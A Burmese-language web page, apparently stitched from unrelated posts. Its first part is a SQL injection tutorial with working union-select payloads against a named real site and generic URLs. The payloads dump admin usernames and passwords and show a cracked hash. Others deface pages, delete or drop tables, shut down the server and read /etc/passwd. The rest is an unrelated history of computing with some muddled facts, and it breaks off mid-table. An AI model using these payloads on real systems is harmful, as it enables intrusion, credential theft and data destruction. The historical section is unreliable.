ေစာေစာက ကၽြန္ေတာ္တုိ႔ MySQL version ကုိ @@version အစား unhex(hex()) နဲ႔သုံးခဲ႔ရတယ္ဆုိရင္ အခု Table နဲ႔ Column ကုိရွာတဲ႔အခါမွာလည္း အဲ႔လုိပဲ သုံးေပးရပါတယ္။

http://sbisa.org/circle.php?id=-26 union select all 1,unhex(hex()),3,group_concat(table_name),5,6 from information_schema.tables where table_schema=database()--

ေနာက္ထက္တစ္ခါ ကၽြန္ေတာ္တုိ႔ Columns ေတြကုိၾကည့္မယ္ဆုိရင္

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(column_name),5,6 from information_schema.columns where table_schema=database()--
---

ဒါဆုိရင္ DB ထဲက table ေတြကုိ ေဖာ္ၿပေပးပါၿပီ... အခု ကၽြန္ေတာ္တု႔ိဒီ tables ေလးေတြကုိ စနစ္တက် မွတ္သားထားပါမယ္... ေနာက္တစ္ဆင့္တက္ကာ ကၽြန္ေတာ္တုိ႔လုိခ်င္တဲ႔ user name နဲ႔ password ေတြ သိမ္းထားတဲ႔ table ကုိၾကည့္ပါမယ္...
group_concat ကုိပဲ ဆက္လက္သုံးပါမယ္.. ဒါေပမဲ႔ ကၽြန္ေတာ္တုိ႔ လုိခ်င္တဲ႔ username, password ေတြသိမ္းထားေလာက္တဲ႔ columns ေတြထဲက စစ္ထုတ္ယူမွာပါ။ ဒီေနရာမွာ ကၽြန္ေတာ္တုိ႔ မွန္းထားတဲ႔ table အမည္ကုိ from information_schema.tables where table_schema=database-- ေနရာမွာ ထည့္သြင္းမွာၿဖစ္ပါတယ္..
0x3a ဆုိတာကေတာ့ ":" ရဲ႕ hex code ပါ။

http://sbisa.org/circle.php?id=-26 union select all 1,2,3,group_concat(username,0x3a,password),5,6 from admin--
----

ဒါဆုိရင္ေတာ့ မိမိတုိ႔လုိခ်င္တဲ႔ username နဲ႔ password ကုိရသြားပါၿပီ... ရရွိထားတဲ႔ password ဟာ plaintext ၿဖစ္တယ္ဆုိရင္ေတာ့ ထပ္ၿပီးေခါင္းရႈပ္စရာမလုိေတာ့ဘူးေပါ႔
တစ္ခ်ဳိ႕ကေတာ့ password hashed လုပ္ထားတဲ႔ အတြက္ ၄င္းတုိ႔အား hash cracker ေတြနဲ႔ ေၿဖထုတ္ေပးရပါလိမ့္မယ္..
ဥပမာ admin:3a39ec8cd0c399cc247936ad5e0b6927
John The Ripper
www.openwalls.org

Cain & Able
www.oxid.it

hash လုပ္ထားတဲ႔ password ေတြသာဆုိရင္ေတာ့ အနည္းငယ္ခက္သြားပါလိမ့္မယ္... အထက္ပါ hash ကုိ crack လုပ္လုိက္ရင္ admin:PlanetCreator ဆုိၿပီးရပါမယ္..
ကဲ ဒါဆုိရင္ေတာ့ admin နဲ႔ password ကုိရၿပီဆုိရင္ ကုိယ္လုပ္ခ်င္သလုိလုပ္ေပေတာ့..

---MySQL version 4 injection---
MySQL version က 4 ၿဖစ္မယ္ဆုိရင္ version 5 လုိ information_schema.tables and information_schema.columns ကုိ support မလုပ္တဲ႔အတြက္ table name နဲ႔ column name ေတြကုိ guess လုပ္ရပါတယ္... ေနာက္တစ္ခုက error message အေပၚမွာအေၿခခံၿပီးခန္႔မွန္းရတာပါ။ The error reports pnc_article in the error ဆုိရင္ pnc ဆုိတဲ႔ prefix ကုိသုံးထားတဲ႔အတြက္ table name က pnc ဆုိတာ ခန္႔မွန္းလုိ႔ရႏုိင္ပါတယ္။

ဥပမာ ကၽြန္ေတာ္က table name ကုိ user ဆုိၿပီး ခန္႔မွန္းလုိက္မယ္.. ဒါဆုိရင္ ေအာက္ပါအတုိင္းရုိက္ထည့္ေပးၾကည့္မယ္ဆုိပါစုိ႔

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM user/*

အထက္ပါအတုိင္းရုိက္ထည့္လုိက္လုိ႔ error ၿဖစ္ေနတယ္ဆုိရင္ ဒါဟာ table မရွိလုိပဲ... ေနာက္တစ္ခါထပ္ၿပီး guess လုိက္ပါ... table name ကုိ tbluser ဆုိၿပီးထားလုိက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT 1,2 FROM tbluser/*

ဒီလုိနည္းနဲ႔ table name ေတြ column ေတြအား ခန္႔မွန္းၿပီးထည့္သြားရပါလိမ့္မယ္...

www.site.com/article.php?id=5 UNION ALL SELECT user_name,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT username,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT pass,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT password,2 FROM tbluser/*
www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 FROM tbluser/*
ေနာက္ဆုံး username နဲ႔ password ကုိ ရတဲ႔အထိေပါ႔...
Table name အခ်ိဳ႕ပါ : user(s), table_user(s), tbluser(s), tbladmin(s), admin(s), members, etc.

ဒါဟာ Injection ရဲ႕ လ်ဳိ႕၀ွက္ထားတဲ႔ Data မ်ားကုိ ရယူတဲ႔အပိုင္းၿဖစ္ပါတယ္... Admin ရဲ႕ username & password ရၿပီဆုိရင္ Admin Login Page မွာရုိက္ထည့္ရပါမယ္... Joomla ဆုိရင္ /administrator နဲ႔ Wordpress ဆုိရင္ /wp-admin ၿဖစ္ပါတယ္.. အခ်ဳိ႕ site ေတြက admin panel ကုိရွာရခက္ ေနပါလိမ့္မယ္.. ဒါဆုိရင္ admin panel finder ေလးေတြကုိသုံးၿပီးရွာေဖြရပါလိမ့္မယ္...

Admin Panel Finder http://www.planetcreator.net/planetcreator/adminpanelfinder/ နဲ႔ရွာႏုိင္ပါတယ္။

---Site အားၿပင္ဆင္ၿခင္း ---
အခ်ဳိ႕ေသာ Site ေတြက admin ရဲ႕ password ကုိရေပမဲ႔ admin panel ကုိရဖုိ႔ခက္ခဲၿခင္း၊ ရွာမေတြ႔ၿခင္းေတြနဲ႔ ၾကံဳရတတ္ပါတယ္... ဒီလုိေနရာမွာ SQL commands ေတြကုိသုံးၿပီး အထဲက site ရဲ႕ contents ေတြကုိၿပင္ဆင္ေၿပးသြားရမွာၿဖစ္ပါတယ္...
ဒါေလးေတြက အေရးပါတဲ႔ command ေလးေတြပါ
UPDATE: It is used to edit infos already in the db without deleting any rows.
DELETE: It is used to delete the contents of one or more fields.
DROP: It is used completely delete a table & all its associated data.

UPDATE :-
www.site.com/article.php?id=5
ဆုိၾကပါစုိ႔ကၽြန္ေတာ္တုိ႔ရဲ႕ query က ေအာက္ပါအတုိင္းၿဖစ္မယ္ဆုိရင္
SELECT title,data,author FROM article WHERE id=5

(table name နဲ႔ column ေတြက အထက္ပါအတုိင္းရွာေဖြက ထည့္ေပးရတာၿဖစ္ပါတယ္)
ေအာက္ပါအတုိင္း site ကုိၿပင္ေပးသြားပါမယ္...

www.site.com/article.php?id=5 UPDATE article SET title='Hacked By SomeOn3'/*

ခက္ဆန္းဆန္းေလး ထက္ၿပီး အရစ္တက္လုိက္မယ္ဆုိရင္

www.site.com/article.php?id=5 UPDATE article SET title='HACKED BY SomeOn3',data='Welcome to My Planet',author='SomeOn3'/*

သတ္မွတ္ထားတဲ႔ page ေၿပာင္းလဲၿပီး update လုပ္ခ်င္တယ္ဆုိရင္ေတာ့ ေအာက္ပါအတုိင္း ရုိက္ထည့္ေပးရပါတယ္..

www.site.com/article.php?id=5 UPDATE article SET title='value 1',data='value 2',author='value 3' WHERE id=5/*

DELETE:- DB Server ထဲကေန အၿမဲတမ္းဖ်က္ပစ္ေတာ့မယ္ဆုိရင္ DELETE command ကုိသုံးသြားပါမယ္..

www.site.com/article.php?id=5 DELETE title,data,author FROM article/*

သတ္မွတ္ထားတဲ႔ page ကုိ delete လုပ္ခ်င္တယ္ဆုိရင္ ေအာက္ပါ table name ရဲ႕ ေနာက္ထဲမွ WHERE နဲ႔ page id ကုိထည့္သြင္းသြားရပါမယ္...

www.site.com/article.php?id=5 DELETE title,data,author FROM article WHERE id=5/*

ဒီတစ္ခုကေတာ့ DROP TABLE ပါ... Table အလုိက္ ဖ်က္ခ်င္တယ္ ဆုိရင္ေတာ့ DROP Table နဲ႔ table name ကုိဆုိၿပီးသုံးပါမယ္...

www.site.com/article.php?id=5 DROP TABLE article/*

ဒီအတုိင္းဖ်က္ရင္ table ေတြေကာ အထဲမွာပါတဲ႔ contents ေတြေကာ အားလုံး ပ်က္သြားပါလိမ့္မယ္...

SHUTTING DOWN MySQL SERVER:

www.site.com/article.php?id=5 SHUTDOWN WITH NOWAIT;

LOADFILE:
Server အထဲက .htaccess, .htpasswd ေတြနဲ႔ password files ေတြၿဖစ္တဲ႔ etc/passwd စသည့္ ဖုိင္ေတြကုိ ယူခ်င္တယ္ဆုိရင္ေတာ့ LOADFILE ကုိသုံးရပါတယ္... ဒါကအသုံးေတာ့နည္းပါတယ္....

www.site.com/article.php?id=5 UNION ALL SELECT load_file('etc/passwd'),2/*

အကယ္၍ hex ေတြနဲ႔ဆုိရင္ေတာ့ ေအာက္ပါတုိင္း သုံးပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT load_file(0x272F6574632F70617373776427)

ဒါကုိ Hex based SQL Injection လုိ႔လည္းေခၚႏုိင္ပါတယ္..

* SELECT LOAD_FILE(0x633A5C626F6F742E696E69)
ဒါဟာ server ရဲ႕ c:\boot.ini ကုိ ဆြဲယူေပးပါလိမ့္မယ္..


---MySQL ROOT---
MySQL version 5 နဲ႔အထက္မွာ mysql.user ဆုိတဲ႔ table တစ္ခုဟာ MySQL servers ေတြမွာရွိပါတယ္... အထဲမွာ hash လုပ္ထားတဲ႔ Password နဲ႔ username ေတြပါ၀င္ပါတယ္... ၄င္းအထဲက

hash ဟာ mysqlsha1 ၿဖစ္တဲ႔အတြက္ John The Ripper နဲ႔ crack လုပ္ဖုိ႔ခက္ပါမယ္..

www.site.com/article.php?id=5 UNION ALL SELECT concat(username,0x3a,password),2 from mysql.user/*

ဒီအတြက္ InsidePro Password Recovery Software ကုိသုံးလုိ႔ရပါတယ္..
http://www.insidepro.com

အျပည့္အစံု

ကြန္ပ်ဳတာသမိုင္း အက်ဥ္း

ကြန္ပ်ဳတာ

တိုက္ရိုက္အဓိပၸါယ္ျပန္လွ်င္ သခ်ာၤတြက္စက္ျဖစ္ပါသည္။ တနည္းအားျဖင့္၎မွာ လွ်ပ္စစ္စြမ္းအားႏွင့္ သခ်ာၤ ပညာရပ္မ်ားအား အသံုးျပဳ၍ လုပ္ငန္းရပ္မ်ားအား အဆင္ေျပေခ်ာ ေမႊ႔လြယ္ကူေစရန္ ဖန္တီးယူထားသည့္ စက္အမ်ဳိးအစား တခုျဖစ္ပါသည္။ မွတ္တမ္းမ်ား သိမ္းဆည္းျခင္း (Datastorage)၊ ျပန္လည္ ေခၚယူျခင္း (Retrive)၊ အစီအစဥ္မ်ား ထည့္သြင္းျခင္းနွင့္ ထုတ္ယူျခင္း(l/O Device)၊ စဥ္းစား တြက္ခ်က္ေပးျခင္း (Calculate) တို႔အား လုပ္ငန္းစဥ္မ်ား အလိုက္အသံုးျပဳႏိုင္ရန္ စီစဥ္ထားပါသည္။

ကြန္ပ်ဳတာအား တီထြင္ရန္ စတင္စဥ္စားခဲ့စဥ္ ထဲကပင္ လုပ္ငန္းရပ္အသီးသီး၌ အသံုးျပဳႏိုင္ရန္ ရည္ရြယ္၍ တီထြင္ခဲ့ျခင္းျဖစ္သည္။ စတင္တီထြင္ခဲ့စဥ္အခ်ိန္တြင္ (Analog Computer) နွင့္ (Digital Computer) ဟူ၍ တည္ေဆာက္ပံုႏွစ္မ်ဳိး ရွိခဲ့ပါသည္။ (Analog Computer)သည္ လွ်ပ္စစ္စြမ္းအားရရွိမႈပမာဏ အနည္းအမ်ားေပၚ မူတည္၍ အနီးစပ္ဆံုး ေဖာ္ျပေပးျခင္းျဖင့္ လုပ္ေဆာင္ပါသည္။ (Digital Computer)သည္ လွ်ပ္စစ္စြမ္းအား အတိအက် ရရွိမႈအေပၚ မူတည္၍ လုပ္ေဆာင္ပါသည္။


ကြန္ပ်ဳတာ မတိုင္မွီ ေခတ္

၁၆ ရာစုႏွစ္ေႏွာင္းပိုင္းမွ စတင္၍ လုပ္ငန္းရပ္ အသီးသီးအား လြယ္ကူေခ်ာေမႊ႔ ဆင္ေျပေစရန္ ပညာရွင္မ်ားမွ[ေပသီး](abacus)အား အေျခခံ၍ အဆင့္ဆင့္ စမ္းသပ္တီထြင္လာခဲ့ၾကပါသည္။ ၁၆၁၄ ခုနွစ္တြင္(John Napier)မွ သခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာ တြက္ခ်က္မႈမ်ားအား အဆင္သင့္ ၾကည့္ရႈႏိုင္ရန္ .၅ ဒႆမ ငါးေနရာအထိ အတိအက် တြက္ယူအေျဖထုတ္ေပးထားေသာ အစီအစဥ္ (Logarithms)အား တီထြင္ဖန္တီးခဲ့သည္။

၁၆၁၅ တြင္ William Oughtred မွေန၍ (Slide Rule) စနစ္အားတီထြင္ ့ ခဲသည္။(Slide Rule) ဆိုသည္မွာလ်ွင္ျမန္စြာတြက္ခ်က္နိုင္ရန္အ တြက္(Logarithms) စနစ္အားအက်ဥ္းခ်ဴံး စီစဥ္ထားေသာသခ်ာၤ ပညာရပ္ပိုင္းဆိုင္ရာအသံုးခ်မွုမ်ားျဖစ္ပါသည္။ ၎အား ယေန႔ကာလ ေခတ္ေပၚအီလက္ထရြန္းနစ္သခ်ာၤတြက္စက္(Electronic Calculator) မ်ားတြင္အသံုးျပဳထားပါသည္။

၁၆၂၃ တြင္ William Schickard မွ သခ်ာၤတြက္စက္၏ အစျဖစ္ေသာ(Mechanical Calculator) အား တီထြင္ ခဲ့ပါသည္။ ပထမဦးဆံုး စက္ကိရိယာျဖင့္ တြက္ခ်က္ျခင္း အစီအစဥ္အား ျပင္သစ္နိုင္ငံသား ျဖစ္သူသခ်ာၤနွင့္ ဒႆနိကပညာရွင္ Blaise Pascal မွ ၁၆၄၂ ခုနွစ္တြင္ တီထြင္ခဲ့ၿပီး ၁၆၄၅ ခုနွစ္တြင္ စတင္ထုတ္လုပ္ခဲ့ပါသည္။

၎ကိရိယာအား အလုပ္လုပ္ေဆာင္ႏိုင္ရန္အ တြက္ လက္ျဖင့္ ေမာင္းႏွင္ရေသာ ဂီယာ(gear)မ်ား၊ စက္သီး (Pulley)မ်ားျဖင့္ ဖြဲ႔စည္းတည္ေဆာက္ထားပါသည္။ ၁၆၇၂-၁၆၇၄ ခုနွစ္တြင္ Gottfried Leibniz မွ ပထမဆံုး(Calculator) အား တီထြင္နိုင္ခဲ့ပါသည္။ ၁၈၀၁ ခုႏွစ္တြင္ Joseph Marie Jacquard ၏ ႀကိဳးပမ္းအားထုတ္မႈျဖင့္ အလိုေလ်ာက္ လည္ပတ္ႏိုင္ေသာ ယက္ကန္းစက္တမ်ဳိးျဖစ္သည့္ (Analytical Engine) ကို ရရွိခဲ့သည္။

၎စက္မွာ အေပါက္မ်ားစြာ ပါ၀င္ေသာကဒ္ျပား (Punched-Card) မ်ားျဖင့္ ထည့္သြင္းအသံုးျပဳ ခဲ့သည္။ ၁၈၂၀ တြင္ Charles Thomas de Colmar မွ ပထမဆံုး ျပည့္စံုေသာ တြက္ခ်က္မႈ အတိုင္းအတာအား တိုးျမႇင့္ေပးခဲ့ပါသည္။

၁၈၂၂ ခုနွစ္တြင္ အဂၤလန္နိုင္ငံမွ Charles Babbage သည္ ဓါတ္ခြဲစက္(Analytical Engine) တခုျပဳလုပ္ရန္အ ၾကံရွိခဲ့၍ ၎စက္တြင္ မည္သည့္ တြက္ခ်က္မႈမ်ဳိးမဆို ပါ၀င္ထည့္သြင္းထားသည္။ သို႔ရာတြင္ ၎စက္အတြက္ လိုအပ္သည့္ ဖြဲ႔စည္းပံုအား တည္ေဆာက္နိုင္ရန္အတြက္မူ ယင္းအခ်ိန္ကာလတြင္ ပညာရွင္မ်ား အေနျဖင့္ မ်ားစြာမွ အခက္အခဲ ရွိခဲ့ၾကပါသည္။

Charles Babbage ၏မူလစိတ္ကူးမွာယင္းစက္သည္အ ခ်က္အလက္ေပါင္းေျမာက္မ်ားစြာအ ားလက္ခံနိုင္၊ထည့္သြင္းနိုင္၊အ ေျဖထုတ္နိုင္ရန္ျဖစ္ပါသည္။

၂၀ ရာစုနွစ္အ ေစာပိုင္းတြင္ ေလဟာမီးလံုး (Vacuum Tube) မ်ားအား အသံုးျပဳျခင္းျဖင့္ ကြန္ပ်ဳတာ စက္မႈပညာမွ အီလက္ထေရာနစ္စနစ္သို႔ ကူးေျပာင္းလာခဲ့ၾက၍ ဂီယာ (Gear) နွင့္ စက္သီး (Pulley) တို႔အား မလိုအပ္ေတာ့ေခ်။ လွ်ပ္စစ္ခလုတ္မ်ားမွ တူညီေသာ ရလဒ္အေျဖမ်ားကို ရရွိနိုင္ျပီျဖစ္ပါသည္။

ယင္းတြင္သေကၤတနွစ္ခုပါသည့္ (Binary) ဘာသာမ်ားျဖင့္အသံုးျပဳထားပါသည္။ အခ်က္အလက္နွင့္ ညႊန္ၾကားခ်က္မ်ားအ ား(l/O) ျဖင့္အက်ဥ္းခ်ဳံးထားပါသည္ ၎စနစ္မွာ (0) နွင့္ (၁) နံပါတ္မ်ားအ ားအ ဖြင့္၊အပိတ္ (On/Off) လုပ္ေပးျခင္းျဖင့္လုပ္ငန္းရပ္မ်ားအား၀န္ပိုက်ဳံ႕လာေစပါသည္။

ေလဟာမီးလံုး (Vacuum Tube) မ်ားမွာဂိီယာ (Gear) နွင့္ စက္သီး(Pulley)မ်ားထက္ ပိုမိုတိက်စြာ အလုပ္လုပ္ေဆာင္လာနိုင္ပါသည္။ Charles Babbage စဥး္စားထားခဲ့သည့္ (Analytical Engine) မွာ ၁၈၃၀ ခုနွစ္ေရာက္မွ အၿပီးသတ္ ဖန္တီးနိုင္ခဲ့ပါသည္။ ေနာက္ဆံုးတြင္ ၎၏ စဥ္းစားမႈမ်ား အားလံုးသည္ ယေန႔ေခတ္ကာလ အသံုးခ်ေနၾကေသာ (Programmable Computer) အျဖစ္သို႔ ေရာက္ရွိလာခဲ့ပါသည္။

၁၈၉၀ ခုနွစ္တြင္ Herman Hollerith မွ အေမရိကန္ သန္းေခါင္စာရင္း မွတ္တမ္းအတြက္ ကဒ္ျပားမ်ားအား အေပါက္ေဖာက္ျခင္းစနစ္ (punched-Card System) အျဖစ္ တိုးျမႇင့္ေပးခဲ့သည္။ ၁၉၃၆ ခုနွစ္တြင္Alan Turing မွ ကြန္ပ်ဳတာ၏ သခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာ သီအိုရီမ်ားအား တိုးျမႇင့္ထုတ္လုပ္ခဲ့သည္။ ၁၉၃၈ ခုနွစ္တြင္ Konrad Zuse မွ(Boolean) အကၡရာသခ်ာၤစနစ္အား အသံုးျပဳ၍ ပထမဆံုး (Binary Caculator) အျဖစ္ တည္ေဆာက္ခဲ့သည္။

၁၉၃၉ ခုႏွစ္တြင္ ပထမဆံုး[သခ်ာၤ] ႏွင့္ [ရူပေဗဒ] ပညာရပ္မ်ားအား လွ်ပ္စစ္စြမ္းအားျဖင့္ အဓိက အသံုးျပဳထားျပီး စက္ပိုင္းဆိုင္ရာ တြက္ခ်က္မႈျဖင့္ အလုပ္လုပ္ႏိုင္ေသာ (J V Atanasoff-Barry) ကြန္ပ်ဳတာအား အေမရိကနိုင္ငံတြင္ တီထြင္ခဲ့သည္။ ၎စက္အား ပထမဆံုး ေလဟာမီးလံုးတြဲမ်ားနွင့္ အသံုးျပဳ ဖန္တီးတည္ေဆာက္ထားခဲ့သည္။ ၎စက္မွာ လုပ္ငန္းရပ္တခုအတြက္သာ ပံုေဖာ္ထားပါသည္။ သို႔ရာတြင္ အလြန္ရွည္လ်ားေသာ သခ်ာၤပညာရပ္ပိုင္းဆိုင္ရာ ဇယားၾကီးမ်ား၏ တြက္ခ်က္မႈမ်ားအား တခုခ်င္းစီ အနီးစပ္ဆံုး တြက္ခ်က္ႏိုင္ေအာင္ ေရးဆြဲခဲ့ပါသည္။

ျမန္မာႏိုင္ငံကြန္ပ်ဳတာ သမိုင္း

ျမန္မာႏိုင္ငံတြင္ ကြန္ပ်ဴတာ တကၠသိုလ္ မဆိုထားဘိ ကြန္ပ်ဴတာဌာနပင္ မရွိေသးမီက (၁၉၇၃ ခုႏွစ္ မတိုင္မီက) တကၠသိုလ္တခု၏ သခ်ၤာဌာနလက္ေအာက္တြင္ တြက္ခ်က္ေရး ယူနစ္အျဖစ္ စတင္ ဖဲြ႕စည္းခဲ့သည္ဟု အဆိုရွိသည္။ လူဦးေရ သန္းေခါင္စာရင္း ေကာက္ယူမွတ္တမ္းျပဳစုေသာ ကိစၥရပ္မ်ားကို ကူညီေဆာင္ရြက္ခဲ့ရေၾကာင္းလည္း သိရသည္။ စကၠဴ ကဒ္ျပားမ်ားကို စက္ျဖင့္ အေပါက္ေဖါက္ၿပီး သံုးရေသာ စနစ္ျဖစ္သည္။ ေနာက္ပိုင္းတြင္ ပီစီမဟုတ္ေသးေသာ ကြန္ျပဴတာမ်ား တစ္စတစ္စ ေရာက္ရွိလာၿပီး
၀န္ႀကီးဌာနအခ်ဳိ႕တြင္ သံုးစဲြလာသည္။

MCC အမည္ျဖင့္ ကြန္ျပဴတာပညာ ဆင့္ပြါးေပးေသာ အစုအဖဲြ႕ရွိခဲ့ဖူးၿပီး ကြန္ျပဴတာသင္တန္းေက်ာင္း လံုး၀မရွိဟု ဆိုသည္။ ေရွးဦးစြာ ေရာက္ရွိလာေသာ PC တို႔တြင္လည္း CD ROM, Sound card, Mouse စသည္တို႔ မပါ၀င္ေသးပဲ DOS Version ျဖင့္ပင္ Run ႏိုင္ေသာ စာစီစာရိုက္အတြက္ (WordStar) စာရင္းဇယားဆဲြရန္ (Foomtools) စသည့္ ေဆာ့ဖ္၀ဲမ်ား သံုးၾကရသည္ ဆိုပါသည္။

ေနာက္ပိုင္း (Wordperfect 5.1) ေပၚေပါက္လာၿပီး (Dbase 4), (Lotus 1-2-3) စသည္တို႔အျပင္ (Harbor Graphic 3 ), (AutoCAD) စသည္တို႔ကိုပါ သံုးစဲြလာႏိုင္ေၾကာင္း သိရပါသည္။ WINDOWS OS ေပၚလာေသာ အေျပာင္းအလဲၿပီးသည့္တိုင္ ျမန္မာျပည္တြင္ ကြန္ျပဴတာျမင္သိထိေတြ႕ဖူးသူ အလြန္နည္းပါးၿပီး WINDOW 95 ေပၚေပါက္လာၿပီးမွ တစတစ ျပည္သူလူထုအတြင္း ကြန္ျပဴတာ သံုးစဲြႏိုင္ေသာ အေျခအေန ေရာက္လာခဲ့ပါသည္။

သင္ၾကားေရးတြင္မူ WINDOWS 3.1 ေခတ္ကပင္ CSS, RS, MCC စေသာ သင္တန္း အဖဲြ႕အစည္းမ်ားလည္း ေပၚထြန္းလာၿပီး။ ACE, KMD စသည့္ အဖဲြ႕အစည္းမ်ားလည္း ဆက္လက္ ေပၚေပါက္လာေၾကာင္း သိရပါသည္။

ကြန္ျပဴတာဂ်ာနယ္သည္လည္း ျမန္မာ့ကြန္ျပဴတာသမိုင္းတြင္ အေရးပါေသာ အခန္းမွ ပါ၀င္ေနကာ အက်ဳိးျပဳ ပံ႔ပိုးကူညီႏိုင္ခဲ့ပါသည္။

ဒင္းနစ္၀င္းသိန္း၏ အစီအစဥ္ျဖင့္ အခ်ဳိ႕အေျခခံပညာေက်ာင္းမ်ားအတြက္ LC630 Macintosh ကြန္ျပဴတာမ်ား အေၾကြးေရာင္းခ်ေပးခဲ့ရာမွ ၿမိဳ႔ငယ္ေလးမ်ား၏ အထက္တန္းေက်ာင္းမ်ားပါ ကိုယ္ထူကိုယ္ထ စနစ္ျဖင့္ Clone PC မ်ား ၀ယ္ယူသိမ္းဆည္း ျပသေသာအေလ့၊ Multimedia classroom မ်ား ဖဲြ႕စည္းတည္ေဆာက္ေသာ ဓေလ့မ်ား ထြန္းကားခဲ့သည္ ဆိုပါသည္။

ဆက္လက္ၿပီး Network ကြန္ယက္ခ်ိတ္ဆက္ေသာ လုပ္ငန္းမ်ား ဖံြ႕ၿဖိဳးလာခဲ့ေသာ္လည္း အင္တာနက္ကို တိုက္ရိုက္ မသံုးႏိုင္ေသးပဲ အင္ထရာနက္သံုးၾကရသည္ ဆိုပါသည္။

Dial up စနစ္ ကြန္ယက္ခ်ိတ္ဆက္ပစၥည္းတို႔မွာ ခြင့္ျပဳခ်က္မရလွ်င္ သံုးစဲြခြင့္မရွိေသာ ကန္႔သတ္ပစၥည္း ျဖစ္ခဲ့ရၿပီး ေနာင္အခါ IP Star စေလာင္းမ်ားျဖင့္ Internet ခ်ိတ္ဆက္ အသံုးျပဳမႈအထိ က်ယ္ျပန္႔ လာသည္ဆိုပါသည္။

ကြန္ျပဴတာ၀န္ေဆာင္မႈအပိုင္းတြင္ စာစီစာရိုက္လုပ္ငန္းမွာ စီးပြားျဖစ္အသြင္ ဦးစြာေပၚေပါက္လာၿပီး၊ ကြန္ျပဴတာျဖင့္ ဇာတာဖဲြ႕ေပးျခင္းစသည္တို႔လည္း ပိုမိုေစာစီးစြာ ေပၚေပါက္ဖူးသည္ဆိုပါသည္။ စာစီရာမွ ဒီဇိုင္းလုပ္ငန္းမ်ား ထိုမွတဆင့္ စီဒီဗီဒီယိုအေခြကူးျခင္း/ MP3 ေျပာင္းေပးျခင္း၊ ငွားရမ္းျခင္း ဓါတ္ပံုအ ေခြထုတ္ျခင္း ဗီဒီယိုတည္းျဖတ္ျခင္း ကာတြန္းရုပ္ရွင္ဖန္တီးျခင္း၊ ဂိမ္းဆိုင္မ်ား ဖြင္ျခင္းတို႔ႏွင့္အတူ ဆိုင္ဘာကေဖးဆိုင္မ်ား ေပၚထြန္းလာသည္အ ထိ ကမၻာႏွင့္အညီ ရင္ေဘာင္တန္းလိုက္လာႏိုင္သလို IT ပညာရွင္မ်ားလည္း အထိုက္အေလ်ာက္ ေပၚေပါက္လာၿပီး ကြန္ယက္မ်ား ခ်ိတ္ဆက္ထိန္းသိမ္းေပးျခင္း ေဆာ့ဖ္၀ဲေရးသားေရာင္းခ်ျခင္း။ Webpage ဒီဇိုင္းေရးဆဲြေၾကာ္ညာေပးျခင္း စသည့္အတတ္မ်ားလည္း တတ္ကၽြမ္းလာေနၿပီ ျဖစ္ပါသည္။ ဟက္ကာမ်ားလည္း ရွိသည္ဟု ၾကားသိေနရပါသည္။

ကြန္ျပဴတာသမုိင္း...........

ကြန္ပ်ဴတာဆုိတာ
“ကြန္ပ်ဴတာ”ဆိုတာ ဘာလဲတဲ့ !!

ေျပာရမယ္ဆိုရင္ ေသခ်ာတာေတာ့ “ကြန္ပ်ဴတာ”ဟာ electronic device (ပစၥည္း) တခုျဖစ္ပါတယ္။ သူ႔ရဲ႕ စတင္ျဖစ္ေပၚလာတဲ့ သမုိင္းေၾကာင္းကို ေလ့လာမယ္ဆိုရင္ ဟိုးလြန္ခဲ့တဲ့ ႏွစ္ေပါင္း (၁၀၀)ေက်ာ္ ေလာက္တုန္းက ေရွးေခတ္လူသားေတြ သုံးခဲ့တ “ေပသီး” (သို႔) ဂဏန္းေပါင္းစက္ (Abacus) ေခတ္ကို ျပန္ေရာက္သြားပါလိမ့္မယ္။ အဲဒီ (Abacus) “ေပသီး”ကေန အ ေျခခံၿပီး လူေတြဟာ ဂဏန္းေပါင္းစက္ တီထြင္လာႏိုင္သည္အထိ ဉာဏ္ရည္ေတြ ဖြံ႕ၿဖိဳးတိုးတက္လာခဲ့ပါတယ္။ အဲဒီ ဂဏန္းေပါင္းစက္မွတဆင့္ မွတ္ဉာဏ္ (Memory) ပိုမိုေကာင္းမြန္ တြက္ခ်က္ (processing)ႏိုင္ေသာ ကြန္ပ်ဴတာေတြအထိ တီထြင္တိုးတက္လာခဲ့ပါတယ္။ ကြန္ပ်ဴတာရယ္လို႔ ျဖစ္ေပၚလာေပမယ့္လည္း ကြန္ပ်ဴတာဆိုတဲ့ ေရွးသမိုင္းေၾကာင္းေတြ ထပ္ရွိပါေသးတယ္။


ဒီအ ပင္ကိုဘယ္လိုစိုက္ခဲ့လဲ၊ ေျမၾသဇာဘယ္လုိသုံးရလဲ၊ ေျမၾသဇာအတြက္ ႏြားေခ်းဘယ္ႏွစ္ပိႆာ ထည့္ရတယ္။ အဲဒီအပင္က စုိထိုင္းတဲ့ေနရာမွာ ေပါက္တာလား ၿပီးေတာ့ ေျခာက္ေသြ႕တဲ့ေနရာမွာ ေပါက္တာလား စသည္ျဖင့္ ပုံစံေတြနဲ႔ ေလ့လာမယ္ဆိုရင္ ဒါက စိုက္ပ်ဳိးေရးသမား အလုပ္ျဖစ္သြားပါျပီ။

ပိုဆိုးတာက  နည္းပညာ (Technology) ဆိုတာကလည္း အခ်ိန္နဲ႔အမွ် ေျပာင္းလဲတိုးတက္ (update) အျမဲျဖစ္ေနတဲ့အခ်ိန္။ ဒီအခ်ိန္မွာ ကိုယ္က သမိုင္းေၾကာင္းပဲ အေသးစိတ္ျပန္သြားၿပီး ေလ့လာမယ္ဆိုရင္ အက်ဳိးထူးလာႏိုင္ဖို႔ နည္းလမ္းနည္းပါတယ္။

ေျမာင္းႀကီးႀကီးခုန္ဖို႔ေနာက္ကိုေျခ(၂)လွမ္း၊ (၃)လွမ္းေလာက္လွမ္းလိုက္ပါ။ ၿပီးေတာ့မွ အရွိန္နဲ႔ ေျပးခုန္လိုက္  ကိုယ္လိုခ်င္တဲ့ ဟုိဖက္အျခမ္းက Update Technology ကို မေရာက္စရာအေၾကာင္း မရွိပါဘူး။


Computer History
Year/Enter
Computer History
Inventors/Inventions
Computer History
Description of Event
1936
Konrad Zuse - Z1 Computer First freely programmable computer.
1942
